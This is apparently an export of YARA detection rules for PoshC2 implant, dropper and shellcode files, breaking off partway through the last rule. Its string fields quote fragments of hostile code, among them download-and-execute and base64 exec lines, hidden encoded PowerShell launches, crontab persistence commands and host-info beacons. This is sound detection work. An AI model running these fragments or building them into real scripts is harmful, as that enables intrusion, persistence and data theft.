Details	Yara rule	1	import "hash" import "pe" rule PoshC2_Csc { meta: description = "PoshC2 - csc.exe" sha256 = "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa" strings: $s1 = "csc.exe" ascii fullword $s2 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword $s3 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword $s4 = "Microsoft.CodeAnalysis" ascii fullword $s5 = "lpThreadId" ascii fullword $s6 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword $s7 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword $s8 = "lpAddress" ascii fullword $s9 = "Protection" ascii fullword $s10 = "Program" ascii fullword $s11 = "lpStartAddress" ascii fullword $s12 = "RefSafetyRulesAttribute" ascii fullword $s13 = "flNewProtect" ascii fullword $s14 = "lpflOldProtect" ascii fullword $s15 = " </trustInfo>" ascii fullword $s16 = "EmbeddedAttribute" ascii fullword $s17 = "dwStackSize" ascii fullword $s18 = "#REPLACEME64#" wide fullword $s19 = "#REPLACEME32#" wide fullword $s20 = "System.Runtime.CompilerServices" ascii fullword $s21 = "FromBase64String" ascii fullword condition: hash.sha256(0, filesize) == "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa" or uint16(0) == 0x5a4d and filesize < 20KB and 8 of them }
Details	Yara rule	1	import "hash" rule PoshC2_DynamicCode { meta: description = "PoshC2 - DynamicCode.exe" sha256 = "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f" strings: $s1 = "DynamicCode.exe" ascii fullword $s2 = "Dynamic Code executed successfully" wide fullword $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword $s4 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword $s5 = "Microsoft.CodeAnalysis" ascii fullword $s6 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword $s7 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword $s8 = "Program" ascii fullword $s9 = "Console" ascii fullword $s10 = "RefSafetyRulesAttribute" ascii fullword $s11 = " </trustInfo>" ascii fullword $s12 = "EmbeddedAttribute" ascii fullword $s13 = "PoshC2DynamicCode" ascii fullword $s14 = "System.Runtime.CompilerServices" ascii fullword $s15 = "System" ascii fullword $s16 = " </requestedPrivileges>" ascii fullword condition: hash.sha256(0, filesize) == "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f" or uint16(0) == 0x5a4d and filesize < 10KB and 8 of them }
Details	Yara rule	1	import "hash" rule PoshC2_Fcomm { meta: description = "PoshC2 - fcomm.exe" sha256 = "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c" strings: $s1 = "fcomm.exe" ascii fullword $s2 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword $s3 = "ParseCommandLineArgs" ascii fullword $s4 = "run-dll-background" wide fullword $s5 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword $s6 = "HostInfo" ascii fullword $s7 = "GetCurrentTasking" ascii fullword $s8 = "objContents" ascii fullword $s9 = "get_Actioned" ascii fullword $s10 = "CreateEncryptionAlgorithm" ascii fullword $s11 = "run-dll" wide fullword $s12 = "run-exe Core.Program Core " wide fullword $s13 = "initialised" ascii fullword $s14 = "loadmodule" wide fullword $s15 = "[!] This is not implemented yet in FComm implant types." wide fullword $s16 = "Microsoft.CodeAnalysis" ascii fullword $s17 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword $s18 = "SafeFileRead" ascii fullword $s19 = "FCommConnect" ascii fullword $s20 = "GzipCompress" ascii fullword condition: hash.sha256(0, filesize) == "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c" or uint16(0) == 0x5a4d and filesize < 40KB and 8 of them }
Details	Yara rule	1	import "hash" rule PoshC2_Pbind { meta: description = "PoshC2 - pbind.exe" sha256 = "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383" strings: $s1 = "pbind.exe" ascii fullword $s2 = "[+] Running task in background, run get-bg to get background output." wide fullword $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword $s4 = "ParseCommandLineArgs" ascii fullword $s5 = "run-dll-background" wide fullword $s6 = "[*] Only run one task in the background at a time per implant." wide fullword $s7 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword $s8 = "#REPLACEPBINDPIPENAME#" wide fullword $s9 = "CreateEncryptionAlgorithm" ascii fullword $s10 = "run-dll" wide fullword $s11 = "run-exe Core.Program Core " wide fullword $s12 = "$[-] Cannot read from pipe" wide fullword $s13 = "loadmodule" wide fullword $s14 = "[-] No output" wide fullword $s15 = "Microsoft.CodeAnalysis" ascii fullword $s16 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword $s17 = "GzipCompress" ascii fullword $s18 = "#REPLACEKEY#" wide fullword $s19 = "Error loading modules {0}" wide fullword $s20 = "run-exe-background" wide fullword $s21 = "Invoke" wide fullword condition: hash.sha256(0, filesize) == "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383" or uint16(0) == 0x5a4d and filesize < 40KB and 8 of them }
Details	Yara rule	1	import "hash" rule PoshC2_Sharp_Powershell_Runner { meta: description = "PoshC2 Sharp_Powershell_Runner.exe" sha256 = "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259" strings: $s1 = "Sharp_Powershell_Runner.exe" ascii fullword $s2 = "basepayload" ascii fullword $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword $s4 = "get_SessionStateProxy" ascii fullword $s5 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword $s6 = "get_PSVariable" ascii fullword $s7 = "Sharp_Powershell_Runner" ascii fullword $s8 = "InvokeAutomation" ascii fullword $s9 = "Microsoft.CodeAnalysis" ascii fullword $s10 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword $s11 = "DllBaseAddress" ascii fullword $s12 = "RunspaceInvoke" ascii fullword $s13 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword $s14 = "$o = IEX $c \| Out-String" wide fullword $s15 = "Program" ascii fullword $s16 = "Encoding" ascii fullword $s17 = "RefSafetyRulesAttribute" ascii fullword $s18 = " </trustInfo>" ascii fullword $s19 = "EmbeddedAttribute" ascii fullword $s20 = "baseAddr" ascii fullword condition: hash.sha256(0, filesize) == "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259" or uint16(0) == 0x5a4d and filesize < 20KB and 8 of them }
Details	Yara rule	1	import "pe" import "hash" rule PoshC2_Dropper { meta: description = "PoshC2 - dropper.exe" sha256 = "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4" strings: $s1 = "AppPolicyGetProcessTerminationMethod" ascii fullword $s2 = " Type Descriptor'" ascii fullword $s3 = "operator co_await" ascii fullword $s4 = "operator<=>" ascii fullword $s5 = ".data$rs" ascii fullword $s6 = "api-ms-win-appmodel-runtime-l1-1-2" wide fullword $s7 = " Class Hierarchy Descriptor'" ascii fullword $s8 = " Base Class Descriptor at (" ascii fullword $s9 = " Complete Object Locator'" ascii fullword $s10 = "__swift_3" ascii fullword $s11 = "__swift_2" ascii fullword $s12 = ".rdata$voltmd" ascii fullword $s13 = "xWI96tRI" ascii fullword $s14 = " delete[]" ascii fullword $s15 = "__swift_1" ascii fullword $s16 = "vKfffff" ascii fullword $s17 = "D$0@8{" ascii fullword $s18 = "api-ms-win-core-file-l1-2-4" wide fullword $s19 = "api-ms-win-core-file-l1-2-2" wide fullword $s20 = " delete" ascii fullword condition: hash.sha256(0, filesize) == "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4" or pe.sections[4].name == "_RDATA" and pe.imports("kernel32.dll", "WriteProcessMemory") and pe.imports("kernel32.dll", "CreateRemoteThread") and pe.imports("kernel32.dll", "OpenProcess") and pe.imports("kernel32.dll", "TerminateProcess") and uint16(0) == 0x5a4d and filesize < 300KB and 8 of them }
Details	Yara rule	1	import "hash" rule PoshC2_DotNet2JS { meta: description = "PoshC2 - DotNet2JS.js" sha256 = "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53" strings: $s1 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $s2 = "AAAAAAAAAAAAAAAAAAAAAAAAA" $s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $s4 = "AAAAAAAAAAAAAEAAAE" $s5 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $s6 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAB" $s7 = "AAAAAAAAAAAAAAAAAAAAAAAAB" $s8 = "AAAAAAAAAAD" $s9 = "AAAAAAAAAEA" $s10 = "AAAAAAAAAAAAAAAAAAAAAAAAAAABD" $s11 = "AADAAAABAAAA" $s12 = "AAAAAAAAAAAAAAAAAAAAAcC0AAAAAAAB" $s13 = "ADAAAAA4AA" $s14 = "AAAAAAAAAAAAAE4A" $s15 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA" $s16 = "AABAACAAAEAA" $s17 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA" $s18 = "function dbg(s) {WScript.Echo(s);}" ascii fullword $s19 = "var ba = enc.GetBytes_4(b);" ascii fullword $s20 = "var length = enc.GetByteCount_2(b);" ascii fullword condition: hash.sha256(0, filesize) == "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53" or uint16(0) == 0x6176 and filesize < 30KB and 8 of them }
Details	Yara rule	1	import "hash" rule PoshC2_Stage2core { meta: description = "PoshC2 - stage2core.so" sha256 = "e3823d2aaaf868aba237b034a13bf8ef6dd6cf0fc4c29f7e7c247d57b06ff61c" strings: $x1 = "SSL - Processing of the ClientKeyExchange handshake message failed in DHM / ECDH Read Public" ascii fullword $x2 = "SSL - Processing of the ServerKeyExchange handshake message failed" ascii fullword $x3 = "Error running command on shell - " ascii fullword $x4 = "SSL - Processing of the ClientKeyExchange handshake message failed" ascii fullword $s5 = "SSL - Processing of the ClientKeyExchange handshake message failed in DHM / ECDH Calculate Secret" ascii fullword $s6 = "SSL - Processing of the compression / decompression failed" ascii fullword $s7 = "SSL - Processing of the NewSessionTicket handshake message failed" ascii fullword $s8 = "PKCS12 - Given private key password does not allow for correct decryption" ascii fullword $s9 = "PKCS5 - Given private key password does not allow for correct decryption" ascii fullword $s10 = "PK - Given private key password does not allow for correct decryption" ascii fullword $s11 = "PEM - Given private key password does not allow for correct decryption" ascii fullword $s12 = "NET - Failed to get an IP address for the given hostname" ascii fullword $s13 = "Error reading private key %s - mbedTLS: (-0xX) %s" ascii fullword $s14 = "PK - Type mismatch, eg attempt to encrypt with an ECDSA key" ascii fullword $s15 = "SSL - Processing of the ServerHello handshake message failed" ascii fullword $s16 = "RSA - The private key operation failed" ascii fullword $s17 = "SSL - Processing of the ChangeCipherSpec handshake message failed" ascii fullword $s18 = "SSL - Processing of the Finished handshake message failed" ascii fullword $s19 = "RSA - The public key operation failed" ascii fullword $s20 = "SSL - Processing of the ServerHelloDone handshake message failed" ascii fullword condition: hash.sha256(0, filesize) == "e3823d2aaaf868aba237b034a13bf8ef6dd6cf0fc4c29f7e7c247d57b06ff61c" or uint16(0) == 0x457f and filesize < 4000KB and 1 of ($x*) and 4 of them }
Details	Yara rule	1	import "hash" rule PoshC2_DropperPs1 { meta: description = "PoshC2 - dropper.ps1" sha256 = "a7f763a818db6da6433b4ffcafbbbd680597fee28bb97760ddd384caf0c25992" strings: $s1 = "$primern = (Get-Webclient -Cookie $pp).downloadstring($script:s)" ascii fullword $s2 = "if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add(\"Host\",$h)}" ascii fullword $s3 = "$procname = (Get-Process -id $pid).ProcessName" ascii fullword $s4 = "$o=\"$env:userdomain;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;$procname;#REPLACEURLID#\"" ascii fullword $s5 = "} if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, \"SessionID=$Cookie\") }" ascii fullword $s6 = "$getcreds = new-object system.management.automation.PSCredential $username,$PSS;" ascii fullword $s7 = "$wc.Headers.Add(\"User-Agent\",\"#REPLACEUSERAGENT#\")" ascii fullword $s8 = "$PSS = ConvertTo-SecureString $password -AsPlainText -Force;" ascii fullword $s9 = "$wp.Credentials = $getcreds;" ascii fullword $s10 = "{$a.Key = [System.Convert]::FromBase64String($key)}" ascii fullword $s11 = "if ($username -and $password) {" ascii fullword $s12 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]" $s13 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]" $s14 = "$d = (Get-Date -Format \"yyyy-MM-dd\");" ascii fullword $s15 = "if ($key.getType().Name -eq \"String\")" ascii fullword $s16 = "$password = \"#REPLACEPROXYPASS#\"" ascii fullword $s17 = "#REPLACEPROXYCOMMAND#" ascii fullword $s18 = "$wc = New-Object System.Net.WebClient;" ascii fullword $s19 = "$e = $a.CreateEncryptor()" ascii fullword $s20 = "elseif($h){$script:s=\"https://$($h)#REPLACECONNECT#\";$script:sc=\"https://$($h)\"}" ascii fullword condition: hash.sha256(0, filesize) == "a7f763a818db6da6433b4ffcafbbbd680597fee28bb97760ddd384caf0c25992" or uint16(0) == 0x5223 and filesize < 10KB and 8 of them }
Details	Yara rule	1	import "hash" rule PoshC2_DropperPy { meta: description = "PoshC2 - dropper.py" sha256 = "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7" strings: $s1 = "if hh[0]: headers = ({'Host':hh[0],'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" ascii fullword $s2 = "if hh[0]:r=urllib2.Request(url2,headers={'Host':hh[0],'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" ascii fullword $s3 = "if hh[0]: r=urllib2.Request(url,headers={'Host':hh[0],'User-agent':ua})" ascii fullword $s4 = "else: headers = ({'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" ascii fullword $s5 = "else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" ascii fullword $s6 = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,procname,urlid))" ascii fullword $s7 = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,pname,urlid))" ascii fullword $s8 = "else: r=urllib2.Request(url,headers={'User-agent':ua})" ascii fullword $s9 = "hn=socket.gethostname();o=urllib2.build_opener()" ascii fullword $s10 = "exec(base64.b64decode(x))" ascii fullword $s11 = "html = response.read().decode('utf-8');x=decrypt(key, html)" ascii fullword $s12 = "ua=\"#REPLACEUSERAGENT#\"" ascii fullword $s13 = "url=serverclean[0]+\"#REPLACEQUICKCOMMAND#\"" ascii fullword $s14 = "res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\\0');" ascii fullword $s15 = "serverclean=[#REPLACEHOSTPORT#]" ascii fullword $s16 = "pykey=\"#REPLACESPYTHONKEY#\"" ascii fullword $s17 = "if pykey in b and pyhash == s and cstr < kdn: " ascii fullword $s18 = "import os,sys,base64,ssl,socket,pwd,hashlib,time" ascii fullword $s19 = "kdn=time.strptime(\"#REPLACEKILLDATE#\",\"%Y-%m-%d\")" ascii fullword $s20 = "cstr=time.strftime(\"%Y-%m-%d\",time.gmtime());cstr=time.strptime(cstr,\"%Y-%m-%d\")" ascii fullword condition: hash.sha256(0, filesize) == "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7" or uint16(0) == 0x6d69 and filesize < 6KB and 8 of them }
Details	Yara rule	1	import "hash" rule PoshC2_ImplantCorePy { meta: description = "PoshC2 - Implant-Core.py" sha256 = "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88" strings: $x1 = " # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/" $x2 = " # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/" $s3 = " s.call(\"crontab -l \| { cat; echo '* 10 * * * sh %%s'; } \| crontab -\" %% filename, shell=True)" ascii fullword $s4 = " modpayload = modb64logger.replace(\"REPLACEME\",filename)" ascii fullword $s5 = " returnval = \"%%s \\\\r\\\\nKeylogger started here: %%s\" %% (pids, filename)" ascii fullword $s6 = " filename = \"%%s/%%s_psh.sh\" %% (dircontent, uuid.uuid4().hex)" ascii fullword $s7 = " dircontent = \"%%s/.%%s\" %% (os.environ['HOME'], uuid.uuid4().hex)" ascii fullword $s8 = " if hh[0]: req=urllib2.Request(server,dataimagebytes,headers={'Host':str(hh[0]),'User-agent':str(ua),'Cookie':\"Sessi" $s9 = " returnval = \"Ran Start Another Implant - File dropped: %%s\" %% filename" ascii fullword $s10 = " returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)" ascii fullword $s11 = " aes = get_encryption(key, iv)" ascii fullword $s12 = " if hh[0]: req=urllib2.Request(server,headers={'Host':str(hh[0]),'User-agent':str(ua)})" ascii fullword $s13 = " import subprocess as s" ascii fullword $s14 = "modules/python/collection/osx/keylogger.py" ascii fullword $s15 = " if hh[0]: req=urllib2.Request(server,dataimagebytes,headers={'Host':str(hh[0]),'User-agent':str(ua),'Cookie':\"Sessi" $s16 = " postcookie = encrypt(key, taskId).decode(\"utf-8\")" ascii fullword $s17 = " import subprocess" ascii fullword $s18 = " exec(modpayload)" ascii fullword $s19 = " s.call(\"crontab -l \| { cat; } \| grep -v '_psh.sh'\| crontab -\", shell=True)" ascii fullword $s20 = " modb64logger = base64.b64decode(b64logger)" ascii fullword condition: hash.sha256(0, filesize) == "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88" or uint16(0) == 0x6d69 and filesize < 40KB and 1 of ($x*) and 4 of them }
Details	Yara rule	1	import "hash" rule PoshC2_ImplantCoreJS { meta: description = "PoshC2 - Implant-Core.js" sha256 = "0b5c8f00eeaa6a63764f7f4807b53b37696882027443cf458895409c07aad26a" strings: $x1 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/shell.js#L2-L23" ascii fullword $x2 = "// pulled fromhttps://github.com/its-a-feature/Mythic/blob/14b06e3755cea0f291ea6246fc315b9b30388640/Payload_Types/apfell/agent_c" $x3 = "// pulled fromhttps://github.com/its-a-feature/Mythic/blob/14b06e3755cea0f291ea6246fc315b9b30388640/Payload_Types/apfell/agent_c" $x4 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L116-L124" ascii fullword $x5 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/c2_profiles/HTTP.js#L115-L132" $x6 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L9-L30" ascii fullword $x7 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L70-L74" ascii fullword $x8 = "// Pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L2-L7" ascii fullword $x9 = "//console.log(\"Running command: \" + command);" ascii fullword $x10 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L106-L115" ascii fullword $s11 = " //console.log(\"From Server: \" + readCommandClear);" ascii fullword $s12 = " //console.log(\"host header: \" + h);" ascii fullword $s13 = "this.pid = this.procInfo.processIdentifier;" ascii fullword $s14 = "//simply run a shell command via doShellScript and return the response" ascii fullword $s15 = "response = currentApp.doShellScript(command);" ascii fullword $s16 = " //console.log(\"in shell\");" ascii fullword $s17 = "this.procInfo = $.NSProcessInfo.processInfo;" ascii fullword $s18 = "this.osVersion = this.procInfo.operatingSystemVersionString.js;" ascii fullword $s19 = " let decryptedData = $.SecTransformExecute(decrypt, Ref());" ascii fullword $s20 = " let encryptedData = $.SecTransformExecute(encrypt, err);" ascii fullword condition: hash.sha256(0, filesize) == "0b5c8f00eeaa6a63764f7f4807b53b37696882027443cf458895409c07aad26a" or uint16(0) == 0x2f2f and filesize < 40KB and 1 of ($x*) and all of them }
Details	Yara rule	1	import "hash" rule PoshC2_ImplantCorePs1 { meta: description = "PoshC2 - Implant-Core.ps1" sha256 = "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2" strings: $x1 = "$payloadraw = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)\"" ascii fullword $s2 = "$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))" ascii fullword $s3 = "$NewScript = \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64Stri" $s4 = "$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear)" ascii fullword $s5 = "g(`\"$EncodedCompressedScript`\"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()\"" ascii fullword $s6 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" ascii fullword $s7 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" ascii fullword $s8 = "$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)" ascii fullword $s9 = "$payload = $payloadraw -replace \"`n\", \"\"" ascii fullword $s10 = "$NewScript = \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64Stri" $s11 = " [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($unencrypte" $s12 = " [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($unencrypte" $s13 = " $splitcmd = $ReadCommandClear -replace \"multicmd\",\"\"" ascii fullword $s14 = " $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencrypte" $s15 = " if ($ReadCommandClear -match (\"(.+)Base64\")) { $result = $Matches[0] } # $result doesn't app" $s16 = " $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencrypte" $s17 = " if ($ReadCommandClear -match (\"(.+)Base64\")) { $result = $Matches[0] } # $result doesn't app" $s18 = "function Decrypt-String($key, $encryptedStringWithIV) {" ascii fullword $s19 = "dData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()" ascii fullword $s20 = " if (($ReadCommandClear) -and ($ReadCommandClear -ne \"fvdsghfdsyyh\")) {" ascii fullword condition: hash.sha256(0, filesize) == "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2" or uint16(0) == 0x6b24 and filesize < 40KB and 1 of ($x*) and 4 of them }
Details	Yara rule	1	import "hash" rule PoshC2_PbindPs1 { meta: description = "PoshC2 - pbind.ps1" sha256 = "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7" strings: $s1 = " $decCommand = Decrypt-String -key $key -encryptedStringWithIV $command" ascii fullword $s2 = " $decCommand = Decrypt-String -key $key -encryptedStringWithIV $command" ascii fullword $s3 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" ascii fullword $s4 = " $encCommand2 = Encrypt-String -unencryptedString $res -Key $key" ascii fullword $s5 = " $encCommand = Encrypt-String -unencryptedString 'COMMAND' -Key $key" ascii fullword $s6 = " $encbad = Encrypt-String -unencryptedString 'This should never fire! - crypto failure' -Key $key" ascii fullword $s7 = "$Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($pname,'InOut',100, 'Byte', 'None', 4096, 4096, $PipeSecurity)" ascii fullword $s8 = " if ($decCommand -eq 'KILLPIPE'){exit}" ascii fullword $s9 = "invoke-pserv -secret #REPLACEPBINDSECRET# -key #REPLACEKEY# -pname #REPLACEPBINDPIPENAME#" ascii fullword $s10 = " $command = $pipeReader.ReadLine()" ascii fullword $s11 = "$PipeSecurity = New-Object System.IO.Pipes.PipeSecurity" ascii fullword $s12 = "$AccessRule = New-Object System.IO.Pipes.PipeAccessRule( 'Everyone', 'ReadWrite', 'Allow' )" ascii fullword $s13 = " $command = $pipeReader.ReadLine()" ascii fullword $s14 = " $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)" ascii fullword $s15 = " $fileContentBytes = [System.Text.Encoding]::Unicode.GetBytes($res)" ascii fullword $s16 = " [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)" ascii fullword $s17 = " {$aesManaged.Key = [System.Convert]::FromBase64String($key)}" ascii fullword $s18 = " $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)" ascii fullword $s19 = " if ($decCommand -eq 'EXIT') { break }" ascii fullword $s20 = " $encSure = Encrypt-String -unencryptedString 'SURE' -Key $key" ascii fullword condition: hash.sha256(0, filesize) == "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7" or uint16(0) == 0x7566 and filesize < 10KB and 8 of them }
Details	Yara rule	1	import "hash" rule PoshC2_Shellcode { meta: description = "PoshC2 - Sharp_v2_x64_dll.b64, Sharp_v2_x64_Shellcode.b64, Sharp_v2_x86_dll.b64, Sharp_v2_x86_Shellcode.b64, Sharp_v4_x64_dll.b64, Sharp_v4_x64_Shellcode.b64, Sharp_v4_x86_dll.b64, Sharp_v4_x86_Shellcode.b64" sha256_1 = "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e" sha256_2 = "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2" sha256_3 = "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3" sha256_4 = "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9" sha256_5 = "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989" sha256_6 = "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6" sha256_7 = "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019" sha256_8 = "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9" strings: $s1 = "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB" $s2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $s4 = "ACAAAAAAAAA" $s5 = "ABAAAAAAAAA" $s6 = "AAAADAAAAA" $s7 = "EAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $s8 = "AAAABAAAAA" $s9 = "AbAAAAAAAc" $s10 = "AAAACAAAAA" $s11 = "AAAAAAAAAAAAAAAAAAA" condition: hash.sha256(0, filesize) == "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e" or hash.sha256(0, filesize) == "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2" or hash.sha256(0, filesize) == "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3" or hash.sha256(0, filesize) == "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9" or hash.sha256(0, filesize) == "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989" or hash.sha256(0, filesize) == "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6" or hash.sha256(0, filesize) == "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019" or hash.sha256(0, filesize) == 